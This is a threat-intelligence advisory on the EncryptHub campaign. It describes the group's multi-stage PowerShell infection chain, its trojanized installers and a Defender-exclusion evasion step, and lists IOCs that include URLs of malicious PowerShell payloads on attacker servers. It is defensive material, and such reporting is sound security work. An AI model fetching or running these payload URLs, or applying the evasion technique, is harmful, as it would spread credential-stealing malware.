April 24, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Multiple QNAP Products Vulnerabilities
March 11, 2025Strela Stealer Malware Targets Microsoft Outlook Users for Credential Theft – Active IOCs
March 11, 2025Multiple QNAP Products Vulnerabilities
March 11, 2025Strela Stealer Malware Targets Microsoft Outlook Users for Credential Theft – Active IOCs
March 11, 2025
Severity
High
Analysis Summary
EncryptHub, a highly sophisticated cybercriminal group, has compromised around 600 organizations through a multi-stage malware campaign. The attackers leveraged multiple layers of PowerShell scripts to gather system data, exfiltrate sensitive information, evade detection, and deploy information stealers. Their primary infection method involved trojanized versions of widely used applications, including QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto Global Protect. These fake applications were generated between November 25th, 2024, and January 1st, 2025, and were signed with code-signing certificates, initially issued to “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” before being revoked. By February 4th, 2025, the group had switched to a new certificate registered under “Encrypthub LLC,” showcasing their adaptability.
A key aspect of EncryptHub’s operation is its use of third-party distribution channels to maximize reach. They utilized a pay-per-install service called “LabInstalls,” operating via a Telegram bot, allowing them to automate malicious payload distribution. According to Researchers, EncryptHub strategically prioritizes stolen credentials based on cryptocurrency ownership, corporate affiliations, and the presence of VPN software, reflecting a highly targeted approach. Researchers also discovered operational security lapses by the attackers, inadvertently exposing critical infrastructure details, which allowed security analysts to map EncryptHub’s tactics in depth.
The attack sequence begins with a PowerShell command fetching the first-stage payload from a compromised domain, designed to steal credentials from messaging applications, crypto wallets, password managers, and VPN clients. The second stage involves a PowerShell script, runner.ps1, which processes base64-encoded MSC files to embed malicious URLs. In the third stage, an HTML-based loader manipulates Windows Defender settings to exclude the TEMP folder from scanning while downloading additional scripts. The final stage delivers Rhadamanthys malware, completing the infection chain and ensuring persistent access.
EncryptHub’s activities indicate ongoing evolution, with researchers detecting the development of “EncryptRAT,” a remote access Trojan designed for centralized command-and-control operations. This suggests the group may soon commercialize its malware as a service for other cybercriminals. Organizations are urged to implement robust security measures, including endpoint detection, multi-layered defenses, and continuous monitoring, to defend against this rapidly evolving threat landscape.
Impact
- Exfiltrate Sensitive Information
- Evade Detection
- Gain Access
Indicators of Compromise
IP
45.131.215.16
64.95.13.166
82.115.223.199
185.215.113.97
31.41.244.11
185.215.113.39
MD5
40c33d6796a0092c1ea09650a254370b
e295d3217ccd1310cfb3f599758f41ff
9747203f97be19e5e4445dba62035f1a
f6b7467e9067d20e853d682989582e81
87792cf4bd370f483a293a23c4247c50
832b3d652330366ce49ed4667bc43f0b
5488c867b16fa0ff44dc975caf8e5f8e
e2d005af8f840f371ab2cef870dacbcf
6522aad0b04cb58ab8cf30b3a8578fb1
SHA-256
532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3
37bf1269a21cba22af239e734de043f1d08d61b44414bcf63b1b9198e6a8bc87
7d222bb62ae995479f05d4bddaa0b7d6dd7ade8d9c438214b00cc1d1be9b9db1
cc70570dd68a01ef43497c13ea7e5620256208b73bd1e4487f3bf0c91617169f
725df91a9db2e077203d78b8bef95b8cf093e7d0ee2e7a4f55a30fe200c3bf8f
c124f307ffbfdba7190c0df9651e895c720962094a78a0af347b2f1e7a8962d0
90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd
1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1
411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd
SHA1
4fe2536fe0ac8e04ccceb1769e33fe3dff96e2a4
47347a8c85d90e2eb5dc966f305c596009f41128
6a66d2e6441acfa331ea428a4e3fad352afa82c6
d94ea984003734cde0d50f981de47d35a2638d16
a225bee48074feac53c7cb2f3929a41f7b4a71d3
9bd0b7a37a0791e7ff6bc270d18d3fbd887752c8
46d79522034154848935839619d622cb56297bc3
c1bd7bc905fee7f749329fbd70fd8fd37319b300
d4ece3957927d4440a43a00a7c0d30ea21238809
URL
- http://185.215.113.97/files/5094364719/LR8QUOU.ps1
- http://31.41.244.11/files/5094364719/WClchuE.ps1
- http://185.215.113.39/files/5094364719/7GVy9sB.ps1
- http://31.41.244.11/files/5094364719/wclchue.ps1
- http://31.41.244.11/files/5094364719/wVjWGck.ps1
- http://185.215.113.39/files/5094364719/pcuy9xE.ps1
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Deploy advanced endpoint detection and response (EDR) solutions.
- Regularly update and patch all software, especially security tools.
- Enforce multi-factor authentication (MFA) for all user accounts.
- Limit administrative privileges and use role-based access control (RBAC).
- Implement network segmentation to contain threats.
- Use email filtering and attachment scanning to detect phishing attempts.
- Continuously monitor logs for unusual authentication attempts and data exfiltration.
- Set up alerts for PowerShell execution and unauthorized system modifications.
- Verify software integrity before installation; avoid downloading from untrusted sources.
- Revoke and replace any compromised digital certificates.
- Conduct regular security awareness training on phishing and social engineering threats.
- Educate employees on identifying trojanized applications and suspicious downloads.
- Maintain regular offline backups of critical data.
- Develop and test an incident response plan for malware infections.
